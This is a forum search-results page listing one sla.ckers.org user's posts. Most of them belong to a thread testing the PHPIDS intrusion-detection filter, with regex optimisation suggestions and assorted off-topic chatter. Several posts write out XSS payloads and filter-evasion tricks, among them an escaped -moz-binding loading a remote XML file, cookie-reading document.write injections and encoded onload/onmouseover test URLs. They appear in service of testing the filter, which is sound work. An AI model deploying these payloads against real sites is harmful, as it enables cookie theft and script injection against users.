Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
For 802.11 and bluetooth security people alike. Latest trends, attack surface issues, and prevention. How wireless security is becoming the new vector to hacking corporate websites and applications. 

Pages: 12345...LastNext
Current Page: 1 of 21
Results 1 - 30 of 622
4 years ago
CrYpTiC_MauleR
link dont work for me. Is this a local or remote exploit?
Forum: Privacy
4 years ago
CrYpTiC_MauleR
Checked out the source and this comment is in there: /// WARNING: Below is the knowledge of evil. var en_keywords = new Array("sex","porn","nude","naked","nudity","adult","fuck","piss","pussy","lick","xxx","lesbian","homosexual"); So flickr.com with its lesbian
Forum: OMG Ponies
4 years ago
CrYpTiC_MauleR
Christian Anti-Porn https://addons.mozilla.org/en-US/firefox/addon/14582 I can't vouch for it since I have not tested it, but by the looks of it it may warn us of the dangers of looking at granny pr0n as well =o(. Check out the awesome review that was left, looks like those 298 downloaders are one step closer to heaven.
Forum: OMG Ponies
5 years ago
CrYpTiC_MauleR
If you can invoke say a 404 error the server well for Apache usually errors with the pathname/file that it can't find. If it is different from what the actual URL is then you can be sure its being re-written. I am not sure otherwise how you could know.
Forum: Privacy
6 years ago
CrYpTiC_MauleR
I noticed this in a lot of places you use: [^:\s\w,.-\/?+] did you mean it to be: [^:\s\w,.\/?+-] otherwise it will think its a char range from . to / which according to ASCII table is just those 2 chars, so the - is unneeded if it was meant to be a range or the - is being ignored if it was meant to be an included char. Some other possible ones too: [+&!-@] [+-<>=] [+
Forum: Projects
6 years ago
CrYpTiC_MauleR
Did you look into the [:xdigit:] class? (bin|home|conf|usr|etc|proc|opt|sbin|local|dev|tmp|kern|boot|root|sys|system|windows|winnt|program| can be: (home|conf|usr|etc|proc|opt|s?bin|local|dev|tmp|kern|oot|sys|system|windows|winnt|program| join|pop|push|reverse|shift|slice|splice|sort|unshift can be: join|pop|push|reverse|shift|sp?lice|sort|unshift echo|print|print_r|var_
Forum: Projects
6 years ago
CrYpTiC_MauleR
Might I suggest for some possible speed improvements and readability you use the character class 'xdigit' such as [:xdigit:] instead of and maybe replacing AND|OR|XOR|NAND|NOT with N?AND|X?OR|NOT Also correct me if I am wrong can't [-\w\/\\\*] be written as [-\w/\\*] I was aware you do not need to escape the characters since they are within the [ ] and only chars to escape are [ and ]. I have
Forum: Projects
6 years ago
CrYpTiC_MauleR
style="-moz-binding:url(http://h4k.in/mozxss.xml#xss);" trips the -mod-binding sig. but when I do this it does not.. style="-m\oz-bin\ding:url(http://h4k.in/mozxss.xml#xss);" I thought the above is valid, reason you can bypass filters by say using ba\ckg\round-ima\ge:
Forum: Projects
7 years ago
CrYpTiC_MauleR
I cant view it =o(
Forum: Projects
7 years ago
CrYpTiC_MauleR
http://www.securityfocus.com/bid/2118/exploit http://www.securityfocus.com/archive/1/365893 http://www.securityfocus.com/archive/1/399881 http://www.securityfocus.com/bid/8819/exploit All those URL scheme attacks made it through. False Positive: "John Doe" <example@example.com> His behavior is inexcusable. My book's binding came undone. D:\directory\blah.txt I'm gue
Forum: Projects
7 years ago
CrYpTiC_MauleR
Btw here are more schemes if you decided to add it. http://esw.w3.org/topic/UriSchemes/
Forum: Projects
7 years ago
CrYpTiC_MauleR
When will you be ready to test for false positives? I've come across a few.
Forum: Projects
7 years ago
CrYpTiC_MauleR
QuoteBasically correct however pretty much useless for an attacker. If he really wants to gain data or anything, he's going to need more code which is likely to be detected by the IDS. That however does not mean that it's impossible to get through. Therefore, feel free to inject real harmful code. If you succeed, let us know. ;document.body.appendChild(document.createElement(/script/.source)).s
Forum: Projects
7 years ago
CrYpTiC_MauleR
http://phpids.heideri.ch/?test=%23+onclick%3Ddocument.title%3D%2Fzzz%2F.source http://phpids.heideri.ch/?test=x%3Ea%3C%2Fa%3E%3Cbody+onload%3Ddocument.title%3D%2Faaa%2F.source+a
Forum: Projects
7 years ago
CrYpTiC_MauleR
http://www.securityfocus.com/bid/2118/exploit (yeah I know old exploit but many apps use their own schemes, AIM, Yahoo, Skype etc..) You should also detect other schemes in case someone is trying to inject an application vulnerability. \w: should catch them don't know how many false positives it might catch (other than the legit one =oP, unless you put something like (aim|skype|mailto):.
Forum: Projects
7 years ago
CrYpTiC_MauleR
One more thing, what about cases where developers echo input into an inline script. ;document.write(document.cookie);// can be injected O.O, there are so many places to put bad input =oD yay!
Forum: Projects
7 years ago
CrYpTiC_MauleR
Could you edit page so it also inserts the injection into 3 hyperlinks as a URL, in a BODY, and some other random tag where attribute is single, double and not quoted. That way we can also test against thesese types of attacks: onload=document.location=/zzz/.source Seeing not every bit of HTML will be quoted, depending on developer, type of markup being used and using older web applications
Forum: Projects
7 years ago
CrYpTiC_MauleR
http://phpids.heideri.ch/?test=%3Ccode%20onmouseover=document.location=/sss/.source%3Eabcdefghijk%3C/code%3E
Forum: Projects
7 years ago
CrYpTiC_MauleR
Isn't ([\w]+[\s]*=[\s]*("|\')) the same as: (\w+\s*=\s*["\']) Working with PHP for years I've come to know that the smaller a regular expression is the faster it gets run. Speed is essential especially when it comes to iterating over arrays or testing large strings. Many of the regular expressions can be optimized for speed and readability.
Forum: Projects
5 years ago
CrYpTiC_MauleR
Side question, is there a FERPA equivalent in the UK?
Forum: DoS
5 years ago
CrYpTiC_MauleR
>>And actually.. being without electricity would be the least of the problems.. imagine tampering with the data to the point where someone's utility bill comes out to the millions of dollars.. I'd expect people to tamper with their own meter if they have say a wind turbine or solar panel on their property. That way when meter runs backwards and power company pays them for their excess pow
Forum: OMG Ponies
5 years ago
CrYpTiC_MauleR
Does PCI currently or in the future require that the encryption use a strong cipher? Using say RC4 40-bit opposed to using AES 256-bit can mean the difference of stolen info being secured or not. I do love the hash method though, makes it so the company can't even figure out your card number, but nothing beats not storing anything at all.
Forum: Privacy
5 years ago
CrYpTiC_MauleR
I don't have a PHP server at hand at the moment, can anyone benchmark the nanolink.ca script?
Forum: Projects
5 years ago
CrYpTiC_MauleR
http://www.nanolink.ca/pub/sha256/ have you checked that out? It wouldn't be hard at all to edit code so it always uses the script's SHA-256 function no matter if its PHP4 or PHP5. This way no PECL required since its pure PHP code.
Forum: Projects
5 years ago
CrYpTiC_MauleR
Try this, first connect your computer to the modem, restart computer, and restart modem. If you can use the internet still then the router is there just to allow multiple computers to use the same connection. Then you can assume that resetting the Linksys modem to all its defaults including the default login would be safe. Then connect back to the router and try the default login. Or you can ju
Forum: Networking
5 years ago
CrYpTiC_MauleR
"I hate u, u stupid fuck" "Please call" "Please call" "I need to talk to u right now" ooookaaay.....O.O It must have been a serious tummy ache. Do you have to pay per/message your SMS? With my carrier that would have been a $20 tummy ache that some $6 Pepto-Bismol could have fixed.
Forum: OMG Ponies
5 years ago
CrYpTiC_MauleR
QuoteAPRIL NOTICE. Saturday, April 4, 2009 12:44 AM From: "Federal Bureau Of Investigation(FBI)" <fbiheadquaters1@mail2washington.com> Add sender to Contacts To: undisclosed-recipients Anti-Terrorist and Monetary Crimes Division Federal Bureau Of Investigation(FBI) Headquarters In Washington, D.C. J. Edgar Hoover Building 935 Pennsylvania Avenue, NW Washington, D.C. 2053
Forum: OMG Ponies
5 years ago
CrYpTiC_MauleR
I think you should first find out what distro you use, then look for their support forum by Googling it and then ask there. They will be better at answering your question. Good luck.
Forum: Wireless Security
5 years ago
CrYpTiC_MauleR
I fell for it, I read about it on an RSS feed on the 2nd and didn't realize the entry was a day old.
Forum: News and Links
5 years ago
CrYpTiC_MauleR
testimonial hmmm... Quote"It cut my spam down to zero. What a terrific product. It was easy to install and is easy to use. There were no configuration changes for me to make. My kids are now protected on the Internet while using Covert Surfer. Thanks!" - Mel Kohn Professor Wow! It cuts spam to zero for no apparent reason, and also protects your kids from pedophiles!
Forum: Wireless Security
Pages: 12345...LastNext
Current Page: 1 of 21